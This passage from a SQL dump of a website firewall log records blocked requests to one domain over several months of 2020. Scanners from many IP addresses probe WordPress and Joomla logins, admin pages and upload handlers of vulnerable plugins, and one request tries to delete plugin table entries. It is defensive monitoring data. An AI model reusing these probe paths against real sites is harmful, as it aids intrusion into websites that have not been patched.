16:46:09','103.82.235.2','http://smithandsmith.co.za/wp-content/plugins/mailcwp/mailcwp-upload.php','404shield',''),(1900,'2020-01-15 22:47:47','163.172.147.94','http://smithandsmith.co.za///wp-admin/plugin-install.php?tab=upload','404shield',''),(1901,'2020-01-16 01:09:19','175.41.139.245','https://smithandsmith.co.za///wp-login.php','404shield',''),(1902,'2020-01-16 01:09:21','175.41.139.245','https://smithandsmith.co.za///wp-login.php','404shield',''),(1903,'2020-01-16 01:09:22','175.41.139.245','https://smithandsmith.co.za///wp-admin/plugin-install.php?tab=upload','404shield',''),(1904,'2020-01-16 01:09:28','67.75.2.39','https://smithandsmith.co.za///wp-login.php','404shield',''),(1905,'2020-01-16 01:09:29','67.75.2.39','https://smithandsmith.co.za///wp-admin/plugin-install.php?tab=upload','404shield',''),(1906,'2020-01-16 01:09:52','190.111.231.8','http://smithandsmith.co.za///wp-admin/plugin-install.php?tab=upload','404shield',''),(1907,'2020-01-16 01:09:55','5.141.244.52','https://smithandsmith.co.za///wp-login.php','404shield',''),(1908,'2020-01-16 01:10:00','200.89.178.19','http://smithandsmith.co.za///wp-admin/plugin-install.php?tab=upload','404shield',''),(1909,'2020-01-16 01:10:06','93.93.61.93','http://smithandsmith.co.za///wp-login.php','404shield',''),(1910,'2020-01-16 01:10:24','5.141.244.52','https://smithandsmith.co.za///wp-admin/plugin-install.php?tab=upload','404shield',''),(1911,'2020-01-16 01:10:29','103.74.117.89','http://smithandsmith.co.za///wp-login.php','404shield',''),(1912,'2020-01-16 01:10:30','103.74.117.89','http://smithandsmith.co.za///wp-login.php','404shield',''),(1913,'2020-01-16 01:10:31','103.74.117.89','http://smithandsmith.co.za///wp-admin/plugin-install.php?tab=upload','404shield',''),(1914,'2020-01-16 01:10:37','50.0.51.253','http://smithandsmith.co.za///wp-login.php','404shield',''),(1915,'2020-01-16 01:11:42','192.99.36.177','https://smithandsmith.co.za///wp-admin/plugin-install.php?tab=upload','404shield',''),(1916,'2020-01-16 01:12:29','192.99.36.177','https://smithandsmith.co.za///wp-admin/plugin-install.php?tab=upload','404shield',''),(1917,'2020-01-16 02:53:21','27.147.210.35','https://smithandsmith.co.za///wp-login.php','404shield',''),(1918,'2020-01-16 02:53:38','27.147.210.35','https://smithandsmith.co.za///wp-login.php','404shield',''),(1919,'2020-01-16 02:53:58','27.147.210.35','https://smithandsmith.co.za///wp-admin/plugin-install.php?tab=upload','404shield',''),(1920,'2020-01-16 07:18:20','200.89.178.19','http://smithandsmith.co.za///wp-admin/plugin-install.php?tab=upload','404shield',''),(1921,'2020-01-16 07:18:23','51.158.123.35','http://smithandsmith.co.za///wp-admin/plugin-install.php?tab=upload','404shield',''),(1922,'2020-01-16 07:30:00','195.9.114.222','http://smithandsmith.co.za//wp-login.php','404shield',''),(1923,'2020-01-16 07:31:33','187.6.8.138','http://smithandsmith.co.za//wp-login.php','404shield',''),(1924,'2020-01-16 07:32:57','208.255.161.107','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1925,'2020-01-16 08:43:25','45.70.58.172','https://smithandsmith.co.za///wp-login.php','404shield',''),(1926,'2020-01-16 09:11:08','45.70.200.147','https://smithandsmith.co.za//wp-login.php','404shield',''),(1927,'2020-01-16 09:33:50','37.79.244.174','http://smithandsmith.co.za///wp-login.php','404shield',''),(1928,'2020-01-16 09:33:53','37.79.244.174','http://smithandsmith.co.za///wp-login.php','404shield',''),(1929,'2020-01-16 09:33:55','192.99.36.177','http://smithandsmith.co.za///wp-admin/plugin-install.php?tab=upload','404shield',''),(1930,'2020-01-16 13:46:41','67.75.2.39','https://smithandsmith.co.za///wp-login.php','404shield',''),(1931,'2020-01-16 13:46:46','67.75.2.39','https://smithandsmith.co.za///wp-login.php','404shield',''),(1932,'2020-01-16 13:46:47','67.75.2.39','https://smithandsmith.co.za///wp-admin/plugin-install.php?tab=upload','404shield',''),(1933,'2020-01-16 13:47:37','134.209.98.103','https://smithandsmith.co.za///wp-admin/plugin-install.php?tab=upload','404shield',''),(1934,'2020-01-16 16:10:29','186.29.163.97','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1935,'2020-01-16 16:12:45','176.197.145.162','http://smithandsmith.co.za//wp-login.php','404shield',''),(1936,'2020-01-16 21:30:45','171.101.136.176','https://smithandsmith.co.za//wp-login.php','404shield',''),(1937,'2020-01-16 21:32:29','157.245.197.217','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1938,'2020-01-17 03:23:38','200.89.174.105','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1939,'2020-01-17 04:37:59','104.248.91.205','https://smithandsmith.co.za//wp-login.php','404shield',''),(1940,'2020-01-17 04:38:27','104.248.91.205','https://smithandsmith.co.za//wp-login.php','404shield',''),(1941,'2020-01-17 04:38:28','104.248.91.205','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1942,'2020-01-17 04:39:49','157.245.197.217','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1943,'2020-01-18 09:50:58','103.82.235.2','http://smithandsmith.co.za/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php','404shield',''),(1944,'2020-01-20 18:14:24','186.179.163.107','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(1945,'2020-01-25 07:37:14','137.74.176.164','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(1946,'2020-01-25 08:04:05','137.74.176.164','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(1947,'2020-01-25 19:46:46','165.22.24.71','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(1948,'2020-01-26 18:23:23','122.173.135.16','http://smithandsmith.co.za/wp-login.php','404shield',''),(1949,'2020-02-06 06:15:26','92.119.185.126','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1950,'2020-02-06 09:12:12','92.119.185.126','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1951,'2020-02-08 12:38:21','156.67.90.140','http://smithandsmith.co.za/wp-login.php','404shield',''),(1952,'2020-02-14 02:30:12','154.69.196.3','http://smithandsmith.co.za/wp-login.php','404shield',''),(1953,'2020-02-18 08:30:45','105.246.79.177','http://smithandsmith.co.za/administrator/index.php?option=com_users&layout=edit&id=0','nonewadmins',''),(1954,'2020-02-18 08:32:16','105.246.79.177','http://smithandsmith.co.za/administrator/index.php?option=com_users&layout=edit&id=0','nonewadmins',''),(1955,'2020-02-18 09:34:33','92.119.185.126','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1956,'2020-02-18 10:02:29','212.156.55.158','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1957,'2020-02-20 05:09:05','51.39.215.138','http://smithandsmith.co.za/wp-login.php','404shield',''),(1958,'2020-02-23 01:55:59','212.156.55.158','http://smithandsmith.co.za/','sessionshield',''),(1959,'2020-02-24 01:27:18','81.213.76.191','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1960,'2020-02-24 13:22:37','92.119.185.126','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1961,'2020-02-25 09:01:26','13.234.114.119','http://smithandsmith.co.za/wp-login.php','404shield',''),(1962,'2020-02-25 16:06:46','197.46.41.179','http://smithandsmith.co.za/wp-login.php','404shield',''),(1963,'2020-02-28 04:00:12','103.82.235.2','http://smithandsmith.co.za/wp-content/plugins/omni-secure-files/plupload/examples/upload.php','404shield',''),(1964,'2020-02-28 12:25:38','209.90.225.218','http://www.smithandsmith.co.za/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php','404shield',''),(1965,'2020-03-03 11:07:26','103.82.235.2','http://smithandsmith.co.za/wp-admin/css/ie.css','404shield',''),(1966,'2020-03-05 09:08:44','39.40.81.131','http://smithandsmith.co.za/wp-login.php','404shield',''),(1967,'2020-03-06 01:16:47','212.156.55.158','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1968,'2020-03-06 01:53:29','45.136.108.44','http://smithandsmith.co.za/wp-admin/admin-post.php?sds-del-entry-table-row=user&sds-del-entry-first-entry-id=1&sds-del-entry-last-entry-id=50','404shield',''),(1969,'2020-03-08 18:25:44','192.95.29.220','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1970,'2020-03-08 18:27:20','192.95.29.220','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1971,'2020-03-08 18:28:03','192.95.29.220','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1972,'2020-03-08 18:29:00','192.95.29.220','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1973,'2020-03-08 18:44:37','185.81.157.66','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(1974,'2020-03-11 08:02:03','109.236.88.29','http://www.smithandsmith.co.za/wp-content/themes/aries/revslider/rs-plugin/videojs/','404shield',''),(1975,'2020-03-16 23:28:22','46.105.100.224','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1976,'2020-03-16 23:29:52','46.105.100.224','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1977,'2020-03-17 00:49:50','46.105.100.224','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1978,'2020-03-17 00:50:39','46.105.100.224','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1979,'2020-03-18 13:05:46','176.14.206.163','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1980,'2020-03-18 14:51:03','80.80.109.85','http://smithandsmith.co.za/wp-login.php','404shield',''),(1981,'2020-03-18 14:51:06','80.80.109.85','http://smithandsmith.co.za/wp-login.php','404shield',''),(1982,'2020-03-18 14:51:08','80.80.109.85','http://smithandsmith.co.za/wp-login.php','404shield',''),(1983,'2020-03-20 05:03:39','46.105.100.224','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1984,'2020-03-20 05:04:36','46.105.100.224','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1985,'2020-03-20 05:10:16','46.105.100.224','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1986,'2020-03-20 05:11:03','46.105.100.224','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1987,'2020-03-26 20:29:03','185.136.162.234','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(1988,'2020-03-26 22:32:23','198.27.80.123','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1989,'2020-03-26 22:36:16','198.27.80.123','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1990,'2020-03-26 23:25:47','198.27.80.123','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1991,'2020-03-26 23:29:38','198.27.80.123','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1992,'2020-03-27 05:14:46','198.27.80.123','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1993,'2020-03-27 05:15:40','198.27.80.123','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1994,'2020-03-27 05:16:19','198.27.80.123','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1995,'2020-03-27 05:17:50','198.27.80.123','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1996,'2020-03-27 05:56:52','198.27.80.123','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1997,'2020-03-27 05:57:04','198.27.80.123','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1998,'2020-03-27 05:58:59','198.27.80.123','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1999,'2020-03-27 05:59:04','198.27.80.123','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2000,'2020-03-27 21:49:10','201.43.9.138','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(2001,'2020-03-28 12:19:23','198.27.80.123','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(2002,'2020-03-28 12:21:09','198.27.80.123','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(2003,'2020-03-28 12:40:36','198.27.80.123','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(2004,'2020-03-28 12:43:25','198.27.80.123','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(2005,'2020-03-29 11:06:35','109.236.88.29','http://www.smithandsmith.co.za/wp-content/themes/aries/revslider/rs-plugin/videojs/','404shield',''),(2006,'2020-03-30 02:38:18','37.59.56.107','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2007,'2020-03-30 02:41:05','37.59.56.107','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2008,'2020-03-30 03:20:54','37.59.56.107','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2009,'2020-03-30 03:22:22','37.59.56.107','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2010,'2020-03-30 13:09:35','198.27.80.123','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(2011,'2020-03-30 13:09:58','198.27.80.123','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(2012,'2020-03-30 13:12:58','198.27.80.123','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(2013,'2020-03-30 13:13:35','198.27.80.123','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(2014,'2020-03-30 15:17:04','5.128.182.20','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2015,'2020-03-30 16:34:43','5.128.182.20','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2016,'2020-03-30 16:37:25','37.59.56.107','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2017,'2020-03-30 16:39:43','37.59.56.107','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2018,'2020-03-30 17:19:58','37.59.56.107','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2019,'2020-03-30 20:23:51','37.59.56.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(2020,'2020-03-30 20:24:33','37.59.56.107','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(2021,'2020-03-30 21:04:16','37.59.56.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(2022,'2020-03-30 21:05:50','37.59.56.107','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(2023,'2020-03-31 01:24:19','37.59.56.107','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2024,'2020-03-31 01:27:03','37.59.56.107','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2025,'2020-03-31 01:32:52','37.59.56.107','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2026,'2020-03-31 01:34:00','37.59.56.107','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2027,'2020-04-01 18:29:13','37.59.56.107','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2028,'2020-04-01 18:32:18','37.59.56.107','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2029,'2020-04-03 01:57:45','103.82.235.2','http://smithandsmith.co.za/wp-admin/css/ie.css','404shield',''),(2030,'2020-04-04 08:44:23','103.82.235.2','http://smithandsmith.co.za/wp-admin/css/ie.css','404shield',''),(2031,'2020-04-04 10:26:51','79.174.38.172','http://smithandsmith.co.za/wp-login.php','404shield',''),(2032,'2020-04-04 10:26:54','79.174.38.172','http://smithandsmith.co.za/wp-login.php','404shield',''),(2033,'2020-04-04 10:26:56','79.174.38.172','http://smithandsmith.co.za/wp-login.php','404shield',''),(2034,'2020-04-11 00:45:14','198.27.80.123','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2035,'2020-04-11 00:55:54','198.27.80.123','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2036,'2020-04-11 04:43:04','198.27.80.123','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2037,'2020-04-11 04:48:34','198.27.80.123','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2038,'2020-04-11 08:36:52','178.49.245.144','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2039,'2020-04-11 08:36:54','178.49.245.144','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2040,'2020-04-14 23:32:03','37.187.75.16','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2041,'2020-04-14 23:34:45','37.187.75.16','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2042,'2020-04-16 13:50:20','84.17.25.191','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2043,'2020-04-17 19:33:51','178.49.245.144','http://smithandsmith.co.za/','sessionshield',''),(2044,'2020-04-18 18:55:29','198.27.80.123','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2045,'2020-04-18 19:00:25','198.27.80.123','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2046,'2020-04-18 19:16:04','198.27.80.123','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2047,'2020-04-18 19:20:58','198.27.80.123','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2048,'2020-04-19 02:03:42','198.27.80.123','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2049,'2020-04-19 02:07:32','198.27.80.123','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2050,'2020-04-19 02:08:25','198.27.80.123','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2051,'2020-04-19 02:11:51','198.27.80.123','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2052,'2020-04-24 10:11:22','137.117.94.229','http://smithandsmith.co.za/wp-login.php','404shield',''),(2053,'2020-04-24 10:12:16','137.117.94.229','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2054,'2020-04-26 08:58:55','82.223.197.78','http://smithandsmith.co.za/wp-login.php','404shield',''),(2055,'2020-04-26 08:58:59','43.241.61.16','http://smithandsmith.co.za/wp-login.php','404shield',''),(2056,'2020-04-26 09:49:56','118.250.48.11','http://smithandsmith.co.za/administrator/','adminpw',''),(2057,'2020-04-27 09:00:53','192.95.29.220','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2058,'2020-04-27 09:03:18','192.95.29.220','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2059,'2020-05-02 03:42:11','178.49.245.144','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2060,'2020-05-02 12:12:23','88.212.254.167','http://smithandsmith.co.za/wp-content/plugins/dhl/dhlcn/','404shield',''),(2061,'2020-05-02 12:12:23','23.105.252.146','http://smithandsmith.co.za/wp-content/plugins/retail/login.php','404shield',''),(2062,'2020-05-02 18:11:20','37.192.36.170','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2063,'2020-05-03 03:25:54','37.192.36.170','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2064,'2020-05-05 09:10:27','37.192.36.170','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2065,'2020-05-06 06:55:12','37.192.36.170','http://smithandsmith.co.za/','sessionshield',''),(2066,'2020-05-06 16:38:51','37.192.36.170','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2067,'2020-05-07 03:26:25','37.192.36.170','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2068,'2020-05-10 08:23:29','5.255.174.141','http://smithandsmith.co.za/administrator/','adminpw',''),(2069,'2020-05-12 19:45:05','90.154.102.15','http://smithandsmith.co.za/','sessionshield',''),(2070,'2020-05-13 01:40:02','212.33.236.217','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2071,'2020-05-13 04:52:38','37.192.120.228','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2072,'2020-05-13 07:49:06','37.192.120.228','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2073,'2020-05-14 15:39:15','51.15.22.13','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2074,'2020-05-15 14:16:21','138.197.162.193','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(2075,'2020-05-15 16:47:29','138.197.162.193','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(2076,'2020-05-16 00:08:32','138.197.162.193','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(2077,'2020-05-16 00:09:04','138.197.162.193','http://smithandsmith.co.za//wp-admin/install.php','404shield',''),(2078,'2020-05-16 00:57:06','138.197.162.193','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(2079,'2020-05-16 04:48:57','138.197.162.193','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(2080,'2020-05-17 04:39:18','138.197.162.193','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(2081,'2020-05-17 22:09:05','91.121.183.89','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2082,'2020-05-17 22:15:52','91.121.183.89','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2083,'2020-05-17 22:20:25','91.121.183.89','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2084,'2020-05-17 22:28:03','91.121.183.89','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(2085,'2020-05-18 08:44:22','35.171.158.55','http://smithandsmith.co.za/wp-login.php','404shield',''),(2086,'2020-05-21 01:23:03','37.192.96.160','http://smithandsmith.co.za/','sessionshield',''),(2087,'2020-05-23 12:52:06','37.192.120.228','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2088,'2020-05-23 13:23:07','37.192.147.114','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2089,'2020-05-27 06:19:50','37.192.120.228','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2090,'2020-05-28 04:13:18','37.192.96.160','http://smithandsmith.co.za/','sessionshield',''),(2091,'2020-05-29 02:57:14','37.192.147.114','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2092,'2020-06-02 11:04:12','90.154.102.15','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2093,'2020-06-02 15:50:04','45.147.231.229','http://www.smithandsmith.co.za/wp-content/plugins/category-page-icons/css/menu.css','404shield',''),(2094,'2020-06-04 23:51:45','37.79.244.168','http://smithandsmith.co.za/wp-login.php','404shield',''),(2095,'2020-06-04 23:51:47','37.79.244.168','http://smithandsmith.co.za/wp-login.php','404shield',''),(2096,'2020-06-04 23:51:49','37.79.244.168','http://smithandsmith.co.za/wp-login.php','404shield',''),(2097,'2020-06-06 17:48:13','37.192.199.97','http://smithandsmith.co.za/','sessionshield',''),(2098,'2020-06-08 18:33:03','128.199.158.156','https://www.smithandsmith.co.za//administrator/index.php','adminpw',''),(2099,'2020-06-08 18:33:03','128.199.158.156','https://smithandsmith.co.za//administrator/index.php','adminpw',''),(2100,'2020-06-14 12:09:33','41.182.107.145','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(2101,'2020-06-18 03:53:20','198.7.56.172','http://www.smithandsmith.co.za/wp-content/plugins/real3d-flipbook/css/flipbook-admin.css','404shield',''),(2102,'2020-06-20 09:03:15','68.183.203.160','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(2103,'2020-06-20 09:03:16','68.183.203.160','http://www.smithandsmith.co.za///wp-admin/install.php','404shield',''),(2104,'2020-06-20 09:03:35','68.183.203.160','http://smithandsmith.co.za//wp-admin/install.php','404shield',''),(2105,'2020-06-21 02:28:36','37.192.147.114','http://smithandsmith.co.za/','sessionshield',''),(2106,'2020-06-21 06:59:46','37.192.147.114','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2107,'2020-06-21 10:32:35','37.192.26.37','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2108,'2020-06-21 20:56:50','68.183.203.160','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(2109,'2020-06-21 20:56:50','68.183.203.160','http://www.smithandsmith.co.za///wp-admin/install.php','404shield',''),(2110,'2020-06-23 16:41:23','37.192.26.37','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(2111,'2020-06-24 05:37:47','68.183.203.160','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(2112,'2020-06-24 05:37:53','68.183.203.160','http://www.smithandsmith.co.za///wp-admin/install.php','404shield',''),(2113,'2020-06-25 02:57:55','103.82.235.3','http://smithandsmith.co.za/wp-admin/admin-ajax.php','404shield',''),(2114,'2020-06-25 21:52:16','68.183.203.160','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(2115,'2020-06-25 21:52:17','68.183.203.160','http://www.smithandsmith.co.za///wp-admin/install.php','404shield',''),(2116,'2020-06-26 01:13:10','104.215.98.8','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2117,'2020-06-27 07:24:48','161.35.216.165','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2118,'2020-06-27 07:26:56','161.35.216.165','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2119,'2020-06-28 11:21:47','103.82.235.3','http://smithandsmith.co.za/wp-content/plugins/complete-gallery-manager/frames/upload-images.php','404shield',''),(2120,'2020-06-29 07:50:19','37.193.133.146','http://smithandsmith.co.za/','muashield',''),(2121,'2020-06-29 07:50:20','37.193.133.146','http://smithandsmith.co.za/','muashield',''),(2122,'2020-06-29 11:39:23','103.82.235.3','http://smithandsmith.co.za/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.css','404shield',''),(2123,'2020-06-30 03:40:08','68.183.203.160','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(2124,'2020-06-30 03:40:09','68.183.203.160','http://www.smithandsmith.co.za///wp-admin/install.php','404shield',''),(2125,'2020-06-30 09:45:32','103.82.235.3','http://smithandsmith.co.za/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.css','404shield',''),(2126,'2020-06-30 18:29:15','181.31.217.87','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2127,'2020-06-30 18:29:15','181.31.217.87','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2128,'2020-06-30 18:29:15','181.31.217.87','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2129,'2020-07-01 11:37:22','103.82.235.3','http://smithandsmith.co.za/wp-content/plugins/mailcwp/mailcwp-upload.php','404shield',''),(2130,'2020-07-04 08:22:07','1.9.141.180','http://smithandsmith.co.za/wp-login.php','404shield',''),(2131,'2020-07-04 08:22:10','1.9.141.180','http://smithandsmith.co.za/wp-login.php','404shield',''),(2132,'2020-07-04 08:22:12','1.9.141.180','http://smithandsmith.co.za/wp-login.php','404shield',''),(2133,'2020-07-06 19:10:20','91.121.183.89','http://smithandsmith.co.za/wp-login.php','404shield',''),(2134,'2020-07-10 11:01:36','103.82.235.3','http://smithandsmith.co.za/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library','404shield',''),(2135,'2020-07-10 17:39:40','70.37.85.81','http://www.smithandsmith.co.za/index.php/component/users/?task=user.register','wafblacklist',''),(2136,'2020-07-10 17:39:47','70.37.85.81','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2137,'2020-07-10 17:39:47','70.37.85.81','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2138,'2020-07-10 17:39:48','70.37.85.81','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2139,'2020-07-11 05:20:14','103.82.235.3','http://smithandsmith.co.za/wp-content/plugins/radykal-fancy-gallery/admin/generate-code.php','404shield',''),(2140,'2020-07-11 12:11:50','70.37.85.81','http://www.smithandsmith.co.za/index.php/component/users/?task=user.register','wafblacklist',''),(2141,'2020-07-11 12:12:00','70.37.85.81','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2142,'2020-07-11 12:12:00','70.37.85.81','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(2143,'2020-07-12 03:05:48','37.79.244.168','http://smithandsmith.co.za/wp-login.php','404shield',''),(2144,'2020-07-12 03:05:53','37.79.244.168','http://smithandsmith.co.za/wp-login.php','404shield',''),(2145,'2020-07-12 03:05:57','37.79.244.168','http://smithandsmith.co.za/wp-login.php','404shield',''),(2146,'2020-07-14 02:56:30','157.52.227.202','http://smithandsmith.co.za/wp-content/plugins/radykal-fancy-gallery/admin/generate-code.php','404shield',''),(2147,'2020-07-15 22:04:22','167.172.155.86','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(2148,'2020-07-15 22:04:26','167.172.155.86','http://www.smithandsmith.co.za///wp-admin/install.php','404shield',''),(2149,'2020-07-18 17:51:19','70.113.86.177','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2150,'2020-07-18 17:51:19','70.113.86.177','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(2151,'2020-07-18 